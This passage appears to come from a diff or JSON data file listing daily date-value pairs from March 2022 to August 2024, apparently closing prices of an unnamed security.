], + [ + "2022-03-24", + 27.23072624206543 + ], + [ + "2022-03-25", + 27.187744140625 + ], + [ + "2022-03-28", + 28.424638748168945 + ], + [ + "2022-03-29", + 29.88121223449707 + ], + [ + "2022-03-30", + 28.983388900756836 + ], + [ + "2022-03-31", + 27.784700393676758 + ], + [ + "2022-04-01", + 27.665307998657227 + ], + [ + "2022-04-04", + 29.394094467163086 + ], + [ + "2022-04-05", + 27.450407028198242 + ], + [ + "2022-04-06", + 25.645214080810547 + ], + [ + "2022-04-07", + 25.812362670898438 + ], + [ + "2022-04-08", + 24.756946563720703 + ], + [ + "2022-04-11", + 22.9995059967041 + ], + [ + "2022-04-12", + 22.703413009643555 + ], + [ + "2022-04-13", + 24.064476013183594 + ], + [ + "2022-04-14", + 22.44552993774414 + ], + [ + "2022-04-18", + 22.50761604309082 + ], + [ + "2022-04-19", + 23.954635620117188 + ], + [ + "2022-04-20", + 22.87534523010254 + ], + [ + "2022-04-21", + 21.53338050842285 + ], + [ + "2022-04-22", + 19.82370376586914 + ], + [ + "2022-04-25", + 20.559146881103516 + ], + [ + "2022-04-26", + 18.247743606567383 + ], + [ + "2022-04-27", + 18.166555404663086 + ], + [ + "2022-04-28", + 20.086362838745117 + ], + [ + "2022-04-29", + 17.445430755615234 + ], + [ + "2022-05-02", + 18.266843795776367 + ], + [ + "2022-05-03", + 18.3098201751709 + ], + [ + "2022-05-04", + 20.12456512451172 + ], + [ + "2022-05-05", + 17.125463485717773 + ], + [ + "2022-05-06", + 16.528505325317383 + ], + [ + "2022-05-09", + 14.575267791748047 + ], + [ + "2022-05-10", + 15.07671070098877 + ], + [ + "2022-05-11", + 13.73475456237793 + ], + [ + "2022-05-12", + 13.624916076660156 + ], + [ + "2022-05-13", + 15.105362892150879 + ], + [ + "2022-05-16", + 14.637351036071777 + ], + [ + "2022-05-17", + 15.740525245666504 + ], + [ + "2022-05-18", + 13.443439483642578 + ], + [ + "2022-05-19", + 13.171229362487793 + ], + [ + "2022-05-20", + 13.056612014770508 + ], + [ + "2022-05-23", + 13.701325416564941 + ], + [ + "2022-05-24", + 12.84648609161377 + ], + [ + "2022-05-25", + 13.362255096435547 + ], + [ + "2022-05-26", + 14.479755401611328 + ], + [ + "2022-05-27", + 15.898122787475586 + ], + [ + "2022-05-31", + 15.7835054397583 + ], + [ + "2022-06-01", + 15.41578197479248 + ], + [ + "2022-06-02", + 16.667001724243164 + ], + [ + "2022-06-03", + 15.348923683166504 + ], + [ + "2022-06-06", + 15.539950370788574 + ], + [ + "2022-06-07", + 15.917226791381836 + ], + [ + "2022-06-08", + 15.59248161315918 + ], + [ + "2022-06-09", + 14.322157859802246 + ], + [ + "2022-06-10", + 12.793953895568848 + ], + [ + "2022-06-13", + 11.02219009399414 + ], + [ + "2022-06-14", + 11.093823432922363 + ], + [ + "2022-06-15", + 11.891357421875 + ], + [ + "2022-06-16", + 10.439559936523438 + ], + [ + "2022-06-17", + 10.82638931274414 + ], + [ + "2022-06-21", + 11.643021583557129 + ], + [ + "2022-06-22", + 11.600042343139648 + ], + [ + "2022-06-23", + 12.096708297729492 + ], + [ + "2022-06-24", + 13.362255096435547 + ], + [ + "2022-06-27", + 13.0470609664917 + ], + [ + "2022-06-28", + 11.857926368713379 + ], + [ + "2022-06-29", + 11.881805419921875 + ], + [ + "2022-06-30", + 11.461546897888184 + ], + [ + "2022-07-01", + 11.647796630859375 + ], + [ + "2022-07-05", + 12.249528884887695 + ], + [ + "2022-07-06", + 12.48353385925293 + ], + [ + "2022-07-07", + 13.25718879699707 + ], + [ + "2022-07-08", + 13.319273948669434 + ], + [ + "2022-07-11", + 12.469208717346191 + ], + [ + "2022-07-12", + 12.106261253356934 + ], + [ + "2022-07-13", + 12.029850006103516 + ], + [ + "2022-07-14", + 12.154016494750977 + ], + [ + "2022-07-15", + 12.793953895568848 + ], + [ + "2022-07-18", + 12.4978609085083 + ], + [ + "2022-07-19", + 13.591484069824219 + ], + [ + "2022-07-20", + 14.274404525756836 + ], + [ + "2022-07-21", + 14.880910873413086 + ], + [ + "2022-07-22", + 14.1024808883667 + ], + [ + "2022-07-25", + 13.892350196838379 + ], + [ + "2022-07-26", + 13.051836967468262 + ], + [ + "2022-07-27", + 14.68033218383789 + ], + [ + "2022-07-28", + 15.100589752197266 + ], + [ + "2022-07-29", + 15.931550025939941 + ], + [ + "2022-08-01", + 15.907674789428711 + ], + [ + "2022-08-02", + 15.759629249572754 + ], + [ + "2022-08-03", + 17.020397186279297 + ], + [ + "2022-08-04", + 17.26395606994629 + ], + [ + "2022-08-05", + 16.853248596191406 + ], + [ + "2022-08-08", + 16.68132972717285 + ], + [ + "2022-08-09", + 16.108247756958008 + ], + [ + "2022-08-10", + 17.43110466003418 + ], + [ + "2022-08-11", + 17.168445587158203 + ], + [ + "2022-08-12", + 18.137901306152344 + ], + [ + "2022-08-15", + 18.572481155395508 + ], + [ + "2022-08-16", + 18.453092575073242 + ], + [ + "2022-08-17", + 17.81315803527832 + ], + [ + "2022-08-18", + 17.93255043029785 + ], + [ + "2022-08-19", + 16.88190269470215 + ], + [ + "2022-08-22", + 15.55427360534668 + ], + [ + "2022-08-23", + 15.501744270324707 + ], + [ + "2022-08-24", + 15.621132850646973 + ], + [ + "2022-08-25", + 16.442546844482422 + ], + [ + "2022-08-26", + 14.441553115844727 + ], + [ + "2022-08-29", + 13.997417449951172 + ], + [ + "2022-08-30", + 13.529403686523438 + ], + [ + "2022-08-31", + 13.281068801879883 + ], + [ + "2022-09-01", + 13.295395851135254 + ], + [ + "2022-09-02", + 12.741421699523926 + ], + [ + "2022-09-06", + 12.45010757446289 + ], + [ + "2022-09-07", + 13.185555458068848 + ], + [ + "2022-09-08", + 13.400459289550781 + ], + [ + "2022-09-09", + 14.250523567199707 + ], + [ + "2022-09-12", + 14.77107048034668 + ], + [ + "2022-09-13", + 12.340267181396484 + ], + [ + "2022-09-14", + 12.617254257202148 + ], + [ + "2022-09-15", + 11.982091903686523 + ], + [ + "2022-09-16", + 11.748087882995605 + ], + [ + "2022-09-19", + 12.029850006103516 + ], + [ + "2022-09-20", + 11.743310928344727 + ], + [ + "2022-09-21", + 11.098599433898926 + ], + [ + "2022-09-22", + 10.68789291381836 + ], + [ + "2022-09-23", + 10.176898956298828 + ], + [ + "2022-09-26", + 10.038407325744629 + ], + [ + "2022-09-27", + 10.047958374023438 + ], + [ + "2022-09-28", + 10.635360717773438 + ], + [ + "2022-09-29", + 9.737540245056152 + ], + [ + "2022-09-30", + 9.226546287536621 + ], + [ + "2022-10-03", + 9.866480827331543 + ], + [ + "2022-10-04", + 10.783408164978027 + ], + [ + "2022-10-05", + 10.783408164978027 + ], + [ + "2022-10-06", + 10.511194229125977 + ], + [ + "2022-10-07", + 9.312507629394531 + ], + [ + "2022-10-10", + 9.02119255065918 + ], + [ + "2022-10-11", + 8.663019180297852 + ], + [ + "2022-10-12", + 8.643916130065918 + ], + [ + "2022-10-13", + 9.221770286560059 + ], + [ + "2022-10-14", + 8.39080810546875 + ], + [ + "2022-10-17", + 9.216994285583496 + ], + [ + "2022-10-18", + 9.4462251663208 + ], + [ + "2022-10-19", + 9.331608772277832 + ], + [ + "2022-10-20", + 9.174012184143066 + ], + [ + "2022-10-21", + 9.823501586914062 + ], + [ + "2022-10-24", + 10.157796859741211 + ], + [ + "2022-10-25", + 10.76907730102539 + ], + [ + "2022-10-26", + 10.05750846862793 + ], + [ + "2022-10-27", + 9.503532409667969 + ], + [ + "2022-10-28", + 10.363149642944336 + ], + [ + "2022-10-31", + 10.004976272583008 + ], + [ + "2022-11-01", + 9.694559097290039 + ], + [ + "2022-11-02", + 8.69167423248291 + ], + [ + "2022-11-03", + 8.190231323242188 + ], + [ + "2022-11-04", + 8.572283744812012 + ], + [ + "2022-11-07", + 8.844493865966797 + ], + [ + "2022-11-08", + 9.035518646240234 + ], + [ + "2022-11-09", + 8.405134201049805 + ], + [ + "2022-11-10", + 10.243759155273438 + ], + [ + "2022-11-11", + 10.82638931274414 + ], + [ + "2022-11-14", + 10.539849281311035 + ], + [ + "2022-11-15", + 10.964879989624023 + ], + [ + "2022-11-16", + 10.520745277404785 + ], + [ + "2022-11-17", + 10.439559936523438 + ], + [ + "2022-11-18", + 10.430008888244629 + ], + [ + "2022-11-21", + 10.114814758300781 + ], + [ + "2022-11-22", + 10.539849281311035 + ], + [ + "2022-11-23", + 10.85504150390625 + ], + [ + "2022-11-25", + 10.630586624145508 + ], + [ + "2022-11-28", + 10.162571907043457 + ], + [ + "2022-11-29", + 9.919013023376465 + ], + [ + "2022-11-30", + 11.251420021057129 + ], + [ + "2022-12-01", + 11.31350326538086 + ], + [ + "2022-12-02", + 11.179786682128906 + ], + [ + "2022-12-05", + 10.61625862121582 + ], + [ + "2022-12-06", + 9.942891120910645 + ], + [ + "2022-12-07", + 9.823501586914062 + ], + [ + "2022-12-08", + 10.172124862670898 + ], + [ + "2022-12-09", + 9.976323127746582 + ], + [ + "2022-12-12", + 10.339271545410156 + ], + [ + "2022-12-13", + 10.664015769958496 + ], + [ + "2022-12-14", + 10.410906791687012 + ], + [ + "2022-12-15", + 9.379366874694824 + ], + [ + "2022-12-16", + 9.102378845214844 + ], + [ + "2022-12-19", + 8.725103378295898 + ], + [ + "2022-12-20", + 8.686897277832031 + ], + [ + "2022-12-21", + 9.06417465209961 + ], + [ + "2022-12-22", + 8.419957160949707 + ], + [ + "2022-12-23", + 8.443957328796387 + ], + [ + "2022-12-27", + 8.083927154541016 + ], + [ + "2022-12-28", + 7.7574968338012695 + ], + [ + "2022-12-29", + 8.3047456741333 + ], + [ + "2022-12-30", + 8.3047456741333 + ], + [ + "2023-01-03", + 8.117527961730957 + ], + [ + "2023-01-04", + 8.242340087890625 + ], + [ + "2023-01-05", + 7.853505611419678 + ], + [ + "2023-01-06", + 8.467960357666016 + ], + [ + "2023-01-09", + 8.645576477050781 + ], + [ + "2023-01-10", + 8.875997543334961 + ], + [ + "2023-01-11", + 9.317638397216797 + ], + [ + "2023-01-12", + 9.461648941040039 + ], + [ + "2023-01-13", + 9.6488676071167 + ], + [ + "2023-01-17", + 9.70167064666748 + ], + [ + "2023-01-18", + 9.341638565063477 + ], + [ + "2023-01-19", + 9.048811912536621 + ], + [ + "2023-01-20", + 9.788079261779785 + ], + [ + "2023-01-23", + 10.431336402893066 + ], + [ + "2023-01-24", + 10.368931770324707 + ], + [ + "2023-01-25", + 10.29212474822998 + ], + [ + "2023-01-26", + 10.887377738952637 + ], + [ + "2023-01-27", + 11.199406623840332 + ], + [ + "2023-01-30", + 10.52734661102295 + ], + [ + "2023-01-31", + 10.997786521911621 + ], + [ + "2023-02-01", + 11.708250045776367 + ], + [ + "2023-02-02", + 12.917959213256836 + ], + [ + "2023-02-03", + 12.250699996948242 + ], + [ + "2023-02-06", + 11.93867301940918 + ], + [ + "2023-02-07", + 12.677937507629395 + ], + [ + "2023-02-08", + 11.99627685546875 + ], + [ + "2023-02-09", + 11.674649238586426 + ], + [ + "2023-02-10", + 11.4346284866333 + ], + [ + "2023-02-13", + 11.977076530456543 + ], + [ + "2023-02-14", + 12.236297607421875 + ], + [ + "2023-02-15", + 12.509922981262207 + ], + [ + "2023-02-16", + 11.794659614562988 + ], + [ + "2023-02-17", + 11.540234565734863 + ], + [ + "2023-02-21", + 10.728963851928711 + ], + [ + "2023-02-22", + 10.738565444946289 + ], + [ + "2023-02-23", + 11.007387161254883 + ], + [ + "2023-02-24", + 10.450539588928223 + ], + [ + "2023-02-27", + 10.676159858703613 + ], + [ + "2023-02-28", + 10.6233549118042 + ], + [ + "2023-03-01", + 10.364131927490234 + ], + [ + "2023-03-02", + 10.613753318786621 + ], + [ + "2023-03-03", + 11.261811256408691 + ], + [ + "2023-03-06", + 11.309816360473633 + ], + [ + "2023-03-07", + 10.887377738952637 + ], + [ + "2023-03-08", + 11.036189079284668 + ], + [ + "2023-03-09", + 10.455339431762695 + ], + [ + "2023-03-10", + 10.023299217224121 + ], + [ + "2023-03-13", + 10.23931884765625 + ], + [ + "2023-03-14", + 10.935382843017578 + ], + [ + "2023-03-15", + 11.093796730041504 + ], + [ + "2023-03-16", + 11.972275733947754 + ], + [ + "2023-03-17", + 11.794659614562988 + ], + [ + "2023-03-20", + 11.919469833374023 + ], + [ + "2023-03-21", + 12.423516273498535 + ], + [ + "2023-03-22", + 11.916531562805176 + ], + [ + "2023-03-23", + 12.341432571411133 + ], + [ + "2023-03-24", + 12.466971397399902 + ], + [ + "2023-03-27", + 12.211064338684082 + ], + [ + "2023-03-28", + 12.008272171020508 + ], + [ + "2023-03-29", + 12.664935111999512 + ], + [ + "2023-03-30", + 13.007756233215332 + ], + [ + "2023-03-31", + 13.645105361938477 + ], + [ + "2023-04-03", + 13.54853630065918 + ], + [ + "2023-04-04", + 13.413339614868164 + ], + [ + "2023-04-05", + 12.983610153198242 + ], + [ + "2023-04-06", + 13.244346618652344 + ], + [ + "2023-04-10", + 13.215375900268555 + ], + [ + "2023-04-11", + 12.959468841552734 + ], + [ + "2023-04-12", + 12.616649627685547 + ], + [ + "2023-04-13", + 13.340914726257324 + ], + [ + "2023-04-14", + 13.263659477233887 + ], + [ + "2023-04-17", + 13.278145790100098 + ], + [ + "2023-04-18", + 13.287801742553711 + ], + [ + "2023-04-19", + 13.258831024169922 + ], + [ + "2023-04-20", + 12.949812889099121 + ], + [ + "2023-04-21", + 12.973954200744629 + ], + [ + "2023-04-24", + 12.896699905395508 + ], + [ + "2023-04-25", + 12.167610168457031 + ], + [ + "2023-04-26", + 12.370403289794922 + ], + [ + "2023-04-27", + 13.369884490966797 + ], + [ + "2023-04-28", + 13.640275955200195 + ], + [ + "2023-05-01", + 13.601649284362793 + ], + [ + "2023-05-02", + 13.239518165588379 + ], + [ + "2023-05-03", + 12.978782653808594 + ], + [ + "2023-05-04", + 12.833930015563965 + ], + [ + "2023-05-05", + 13.62096118927002 + ], + [ + "2023-05-08", + 13.732017517089844 + ], + [ + "2023-05-09", + 13.466452598571777 + ], + [ + "2023-05-10", + 13.90101146697998 + ], + [ + "2023-05-11", + 14.016894340515137 + ], + [ + "2023-05-12", + 13.872039794921875 + ], + [ + "2023-05-15", + 14.084492683410645 + ], + [ + "2023-05-16", + 14.137602806091309 + ], + [ + "2023-05-17", + 14.644585609436035 + ], + [ + "2023-05-18", + 15.43161678314209 + ], + [ + "2023-05-19", + 15.325392723083496 + ], + [ + "2023-05-22", + 15.484731674194336 + ], + [ + "2023-05-23", + 14.886007308959961 + ], + [ + "2023-05-24", + 14.644585609436035 + ], + [ + "2023-05-25", + 15.702011108398438 + ], + [ + "2023-05-26", + 16.889799118041992 + ], + [ + "2023-05-30", + 17.12639617919922 + ], + [ + "2023-05-31", + 16.778745651245117 + ], + [ + "2023-06-01", + 17.387126922607422 + ], + [ + "2023-06-02", + 17.778228759765625 + ], + [ + "2023-06-05", + 17.816856384277344 + ], + [ + "2023-06-06", + 17.797542572021484 + ], + [ + "2023-06-07", + 16.889799118041992 + ], + [ + "2023-06-08", + 17.469207763671875 + ], + [ + "2023-06-09", + 17.68166160583496 + ], + [ + "2023-06-12", + 18.58457374572754 + ], + [ + "2023-06-13", + 18.999818801879883 + ], + [ + "2023-06-14", + 19.40540313720703 + ], + [ + "2023-06-15", + 20.086210250854492 + ], + [ + "2023-06-16", + 19.699939727783203 + ], + [ + "2023-06-20", + 19.60336685180664 + ], + [ + "2023-06-21", + 18.817726135253906 + ], + [ + "2023-06-22", + 19.442562103271484 + ], + [ + "2023-06-23", + 18.86616325378418 + ], + [ + "2023-06-26", + 18.12023162841797 + ], + [ + "2023-06-27", + 19.016319274902344 + ], + [ + "2023-06-28", + 19.132564544677734 + ], + [ + "2023-06-29", + 19.001785278320312 + ], + [ + "2023-06-30", + 19.859113693237305 + ], + [ + "2023-07-03", + 19.99474334716797 + ], + [ + "2023-07-05", + 19.980209350585938 + ], + [ + "2023-07-06", + 19.510372161865234 + ], + [ + "2023-07-07", + 19.31178092956543 + ], + [ + "2023-07-10", + 19.326313018798828 + ], + [ + "2023-07-11", + 19.602407455444336 + ], + [ + "2023-07-12", + 20.32895278930664 + ], + [ + "2023-07-13", + 21.34128761291504 + ], + [ + "2023-07-14", + 21.32191276550293 + ], + [ + "2023-07-17", + 21.912843704223633 + ], + [ + "2023-07-18", + 22.43596076965332 + ], + [ + "2023-07-19", + 22.43596076965332 + ], + [ + "2023-07-20", + 20.861759185791016 + ], + [ + "2023-07-21", + 20.67770004272461 + ], + [ + "2023-07-24", + 20.760040283203125 + ], + [ + "2023-07-25", + 21.17660140991211 + ], + [ + "2023-07-26", + 20.95863151550293 + ], + [ + "2023-07-27", + 20.7794189453125 + ], + [ + "2023-07-28", + 21.903156280517578 + ], + [ + "2023-07-31", + 21.946748733520508 + ], + [ + "2023-08-01", + 21.7772159576416 + ], + [ + "2023-08-02", + 20.353172302246094 + ], + [ + "2023-08-03", + 20.20786476135254 + ], + [ + "2023-08-04", + 19.92692756652832 + ], + [ + "2023-08-07", + 20.420988082885742 + ], + [ + "2023-08-08", + 19.89786720275879 + ], + [ + "2023-08-09", + 19.234281539916992 + ], + [ + "2023-08-10", + 19.32146644592285 + ], + [ + "2023-08-11", + 18.933971405029297 + ], + [ + "2023-08-14", + 19.56365394592285 + ], + [ + "2023-08-15", + 18.963037490844727 + ], + [ + "2023-08-16", + 18.333354949951172 + ], + [ + "2023-08-17", + 17.713363647460938 + ], + [ + "2023-08-18", + 17.631023406982422 + ], + [ + "2023-08-21", + 18.483510971069336 + ], + [ + "2023-08-22", + 18.401165008544922 + ], + [ + "2023-08-23", + 19.268186569213867 + ], + [ + "2023-08-24", + 17.999143600463867 + ], + [ + "2023-08-25", + 18.42538833618164 + ], + [ + "2023-08-28", + 18.837100982666016 + ], + [ + "2023-08-29", + 20.038331985473633 + ], + [ + "2023-08-30", + 20.372549057006836 + ], + [ + "2023-08-31", + 20.556608200073242 + ], + [ + "2023-09-01", + 20.48395347595215 + ], + [ + "2023-09-05", + 20.537233352661133 + ], + [ + "2023-09-06", + 19.99474334716797 + ], + [ + "2023-09-07", + 19.558809280395508 + ], + [ + "2023-09-08", + 19.616931915283203 + ], + [ + "2023-09-11", + 20.285362243652344 + ], + [ + "2023-09-12", + 19.636310577392578 + ], + [ + "2023-09-13", + 19.830055236816406 + ], + [ + "2023-09-14", + 20.2950496673584 + ], + [ + "2023-09-15", + 19.2536563873291 + ], + [ + "2023-09-18", + 19.297252655029297 + ], + [ + "2023-09-19", + 19.18100357055664 + ], + [ + "2023-09-20", + 18.349328994750977 + ], + [ + "2023-09-21", + 17.30426788330078 + ], + [ + "2023-09-22", + 17.3188533782959 + ], + [ + "2023-09-25", + 17.54730224609375 + ], + [ + "2023-09-26", + 16.764726638793945 + ], + [ + "2023-09-27", + 16.866798400878906 + ], + [ + "2023-09-28", + 17.275104522705078 + ], + [ + "2023-09-29", + 17.31398582458496 + ], + [ + "2023-10-02", + 17.727153778076172 + ], + [ + "2023-10-03", + 16.78902816772461 + ], + [ + "2023-10-04", + 17.469532012939453 + ], + [ + "2023-10-05", + 17.28482437133789 + ], + [ + "2023-10-06", + 18.15489387512207 + ], + [ + "2023-10-09", + 18.422239303588867 + ], + [ + "2023-10-10", + 18.723604202270508 + ], + [ + "2023-10-11", + 19.12218475341797 + ], + [ + "2023-10-12", + 18.898590087890625 + ], + [ + "2023-10-13", + 18.184062957763672 + ], + [ + "2023-10-16", + 18.796512603759766 + ], + [ + "2023-10-17", + 18.616668701171875 + ], + [ + "2023-10-18", + 17.8292293548584 + ], + [ + "2023-10-19", + 17.352872848510742 + ], + [ + "2023-10-20", + 16.57029151916504 + ], + [ + "2023-10-23", + 16.716115951538086 + ], + [ + "2023-10-24", + 17.187610626220703 + ], + [ + "2023-10-25", + 15.928675651550293 + ], + [ + "2023-10-26", + 15.000271797180176 + ], + [ + "2023-10-27", + 15.214143753051758 + ], + [ + "2023-10-30", + 15.70508098602295 + ], + [ + "2023-10-31", + 15.93353271484375 + ], + [ + "2023-11-01", + 16.755002975463867 + ], + [ + "2023-11-02", + 17.64451789855957 + ], + [ + "2023-11-03", + 18.26669692993164 + ], + [ + "2023-11-06", + 18.4757080078125 + ], + [ + "2023-11-07", + 18.995811462402344 + ], + [ + "2023-11-08", + 19.029836654663086 + ], + [ + "2023-11-09", + 18.577783584594727 + ], + [ + "2023-11-10", + 19.81727409362793 + ], + [ + "2023-11-13", + 19.63742446899414 + ], + [ + "2023-11-14", + 20.872058868408203 + ], + [ + "2023-11-15", + 20.930387496948242 + ], + [ + "2023-11-16", + 20.96440887451172 + ], + [ + "2023-11-17", + 20.97899055480957 + ], + [ + "2023-11-20", + 21.72754669189453 + ], + [ + "2023-11-21", + 21.33382797241211 + ], + [ + "2023-11-22", + 21.581724166870117 + ], + [ + "2023-11-24", + 21.474788665771484 + ], + [ + "2023-11-27", + 21.41160011291504 + ], + [ + "2023-11-28", + 21.581724166870117 + ], + [ + "2023-11-29", + 21.503952026367188 + ], + [ + "2023-11-30", + 21.324106216430664 + ], + [ + "2023-12-01", + 21.503952026367188 + ], + [ + "2023-12-04", + 20.891498565673828 + ], + [ + "2023-12-05", + 21.04218292236328 + ], + [ + "2023-12-06", + 20.66790199279785 + ], + [ + "2023-12-07", + 21.53311538696289 + ], + [ + "2023-12-08", + 21.79073715209961 + ], + [ + "2023-12-11", + 22.34486198425293 + ], + [ + "2023-12-12", + 22.884410858154297 + ], + [ + "2023-12-13", + 23.691295623779297 + ], + [ + "2023-12-14", + 23.65240478515625 + ], + [ + "2023-12-15", + 23.934328079223633 + ], + [ + "2023-12-18", + 24.434988021850586 + ], + [ + "2023-12-19", + 24.799541473388672 + ], + [ + "2023-12-20", + 23.697654724121094 + ], + [ + "2023-12-21", + 24.48366928100586 + ], + [ + "2023-12-22", + 24.581308364868164 + ], + [ + "2023-12-26", + 25.03046226501465 + ], + [ + "2023-12-27", + 25.162281036376953 + ], + [ + "2023-12-28", + 25.098814010620117 + ], + [ + "2023-12-29", + 24.752182006835938 + ], + [ + "2024-01-02", + 23.497488021850586 + ], + [ + "2024-01-03", + 22.74564552307129 + ], + [ + "2024-01-04", + 22.364843368530273 + ], + [ + "2024-01-05", + 22.447837829589844 + ], + [ + "2024-01-08", + 23.80017852783203 + ], + [ + "2024-01-09", + 23.956405639648438 + ], + [ + "2024-01-10", + 24.429967880249023 + ], + [ + "2024-01-11", + 24.54713249206543 + ], + [ + "2024-01-12", + 24.576431274414062 + ], + [ + "2024-01-16", + 24.561784744262695 + ], + [ + "2024-01-17", + 24.137041091918945 + ], + [ + "2024-01-18", + 25.17204475402832 + ], + [ + "2024-01-19", + 26.62690544128418 + ], + [ + "2024-01-22", + 26.734312057495117 + ], + [ + "2024-01-23", + 27.05164909362793 + ], + [ + "2024-01-24", + 27.49591827392578 + ], + [ + "2024-01-25", + 27.574031829833984 + ], + [ + "2024-01-26", + 27.066293716430664 + ], + [ + "2024-01-29", + 27.862071990966797 + ], + [ + "2024-01-30", + 27.305517196655273 + ], + [ + "2024-01-31", + 25.699312210083008 + ], + [ + "2024-02-01", + 26.607376098632812 + ], + [ + "2024-02-02", + 27.945070266723633 + ], + [ + "2024-02-05", + 27.80348777770996 + ], + [ + "2024-02-06", + 27.642377853393555 + ], + [ + "2024-02-07", + 28.467453002929688 + ], + [ + "2024-02-08", + 28.584623336791992 + ], + [ + "2024-02-09", + 29.424341201782227 + ], + [ + "2024-02-12", + 29.077713012695312 + ], + [ + "2024-02-13", + 27.70096778869629 + ], + [ + "2024-02-14", + 28.579742431640625 + ], + [ + "2024-02-15", + 28.8189640045166 + ], + [ + "2024-02-16", + 28.028066635131836 + ], + [ + "2024-02-20", + 27.37874984741211 + ], + [ + "2024-02-21", + 27.037002563476562 + ], + [ + "2024-02-22", + 29.375520706176758 + ], + [ + "2024-02-23", + 29.10700798034668 + ], + [ + "2024-02-26", + 29.067949295043945 + ], + [ + "2024-02-27", + 29.248584747314453 + ], + [ + "2024-02-28", + 28.7750244140625 + ], + [ + "2024-02-29", + 29.468280792236328 + ], + [ + "2024-03-01", + 30.820621490478516 + ], + [ + "2024-03-04", + 30.4544620513916 + ], + [ + "2024-03-05", + 28.82384490966797 + ], + [ + "2024-03-06", + 29.35599136352539 + ], + [ + "2024-03-07", + 30.66439437866211 + ], + [ + "2024-03-08", + 29.321819305419922 + ], + [ + "2024-03-11", + 28.980070114135742 + ], + [ + "2024-03-12", + 30.21036148071289 + ], + [ + "2024-03-13", + 29.507335662841797 + ], + [ + "2024-03-14", + 29.26811408996582 + ], + [ + "2024-03-15", + 28.19893455505371 + ], + [ + "2024-03-18", + 28.99471664428711 + ], + [ + "2024-03-19", + 29.19488525390625 + ], + [ + "2024-03-20", + 30.231170654296875 + ], + [ + "2024-03-21", + 30.623146057128906 + ], + [ + "2024-03-22", + 30.686843872070312 + ], + [ + "2024-03-25", + 30.373262405395508 + ], + [ + "2024-03-26", + 30.089078903198242 + ], + [ + "2024-03-27", + 30.35366439819336 + ], + [ + "2024-03-28", + 30.162578582763672 + ], + [ + "2024-04-01", + 30.348764419555664 + ], + [ + "2024-04-02", + 29.535411834716797 + ], + [ + "2024-04-03", + 29.731401443481445 + ], + [ + "2024-04-04", + 28.3300838470459 + ], + [ + "2024-04-05", + 29.329627990722656 + ], + [ + "2024-04-08", + 29.349227905273438 + ], + [ + "2024-04-09", + 29.65300750732422 + ], + [ + "2024-04-10", + 28.87395477294922 + ], + [ + "2024-04-11", + 30.231170654296875 + ], + [ + "2024-04-12", + 28.771059036254883 + ], + [ + "2024-04-15", + 27.32564926147461 + ], + [ + "2024-04-16", + 27.33054542541504 + ], + [ + "2024-04-17", + 26.316307067871094 + ], + [ + "2024-04-18", + 25.845937728881836 + ], + [ + "2024-04-19", + 24.243732452392578 + ], + [ + "2024-04-22", + 24.94928741455078 + ], + [ + "2024-04-23", + 26.0615234375 + ], + [ + "2024-04-24", + 26.316307067871094 + ], + [ + "2024-04-25", + 25.894935607910156 + ], + [ + "2024-04-26", + 27.085561752319336 + ], + [ + "2024-04-29", + 27.4089412689209 + ], + [ + "2024-04-30", + 25.84103775024414 + ], + [ + "2024-05-01", + 25.282468795776367 + ], + [ + "2024-05-02", + 26.218313217163086 + ], + [ + "2024-05-03", + 27.781320571899414 + ], + [ + "2024-05-06", + 28.692663192749023 + ], + [ + "2024-05-07", + 28.692663192749023 + ], + [ + "2024-05-08", + 28.63876724243164 + ], + [ + "2024-05-09", + 28.795557022094727 + ], + [ + "2024-05-10", + 28.991546630859375 + ], + [ + "2024-05-13", + 29.182632446289062 + ], + [ + "2024-05-14", + 29.726503372192383 + ], + [ + "2024-05-15", + 31.098417282104492 + ], + [ + "2024-05-16", + 30.907331466674805 + ], + [ + "2024-05-17", + 30.838733673095703 + ], + [ + "2024-05-20", + 31.475692749023438 + ], + [ + "2024-05-21", + 31.63738250732422 + ], + [ + "2024-05-22", + 31.617788314819336 + ], + [ + "2024-05-23", + 31.147415161132812 + ], + [ + "2024-05-24", + 32.01956558227539 + ], + [ + "2024-05-28", + 32.367435455322266 + ], + [ + "2024-05-29", + 31.691280364990234 + ], + [ + "2024-05-30", + 30.672142028808594 + ], + [ + "2024-05-31", + 30.63784408569336 + ], + [ + "2024-06-03", + 30.936729431152344 + ], + [ + "2024-06-04", + 31.16701316833496 + ], + [ + "2024-06-05", + 33.048500061035156 + ], + [ + "2024-06-06", + 33.00930404663086 + ], + [ + "2024-06-07", + 32.88680648803711 + ], + [ + "2024-06-10", + 33.234683990478516 + ], + [ + "2024-06-11", + 33.920650482177734 + ], + [ + "2024-06-12", + 35.25826644897461 + ], + [ + "2024-06-13", + 35.82173156738281 + ], + [ + "2024-06-14", + 36.34109878540039 + ], + [ + "2024-06-17", + 37.65911865234375 + ], + [ + "2024-06-18", + 37.678714752197266 + ], + [ + "2024-06-20", + 36.7918701171875 + ], + [ + "2024-06-21", + 36.45379638671875 + ], + [ + "2024-06-24", + 35.21906661987305 + ], + [ + "2024-06-25", + 36.394996643066406 + ], + [ + "2024-06-26", + 36.622718811035156 + ], + [ + "2024-06-27", + 36.88832473754883 + ], + [ + "2024-06-28", + 36.30794143676758 + ], + [ + "2024-07-01", + 36.903072357177734 + ], + [ + "2024-07-02", + 38.0343132019043 + ], + [ + "2024-07-03", + 38.96881866455078 + ], + [ + "2024-07-05", + 40.14924621582031 + ], + [ + "2024-07-08", + 40.41484069824219 + ], + [ + "2024-07-09", + 40.50337600708008 + ], + [ + "2024-07-10", + 41.77233123779297 + ], + [ + "2024-07-11", + 39.0278434753418 + ], + [ + "2024-07-12", + 39.66231918334961 + ], + [ + "2024-07-15", + 39.957427978515625 + ], + [ + "2024-07-16", + 39.986942291259766 + ], + [ + "2024-07-17", + 36.470252990722656 + ], + [ + "2024-07-18", + 35.92430114746094 + ], + [ + "2024-07-19", + 34.9504508972168 + ], + [ + "2024-07-22", + 36.47517013549805 + ], + [ + "2024-07-23", + 36.081695556640625 + ], + [ + "2024-07-24", + 32.19120407104492 + ], + [ + "2024-07-25", + 31.11898422241211 + ], + [ + "2024-07-26", + 32.00922393798828 + ], + [ + "2024-07-29", + 32.19613265991211 + ], + [ + "2024-07-30", + 30.88290023803711 + ], + [ + "2024-07-31", + 33.5831298828125 + ], + [ + "2024-08-01", + 31.163253784179688 + ], + [ + "2024-08-02", + 28.890933990478516 + ], + [ + "2024-08-05", + 26.37268829345703 + ], + [ + "2024-08-06", + 27.031757354736328 + ], + [ + "2024-08-07", + 26.16119384765625 + ], + [ + "2024-08-08", + 28.556476593017578 + ], + [ + "2024-08-09", + 28.945032119750977 + ], + [ + "2024-08-12", + 29.14177131652832 + ], + [ + "2024-08-13", + 31.261621475219727 + ], 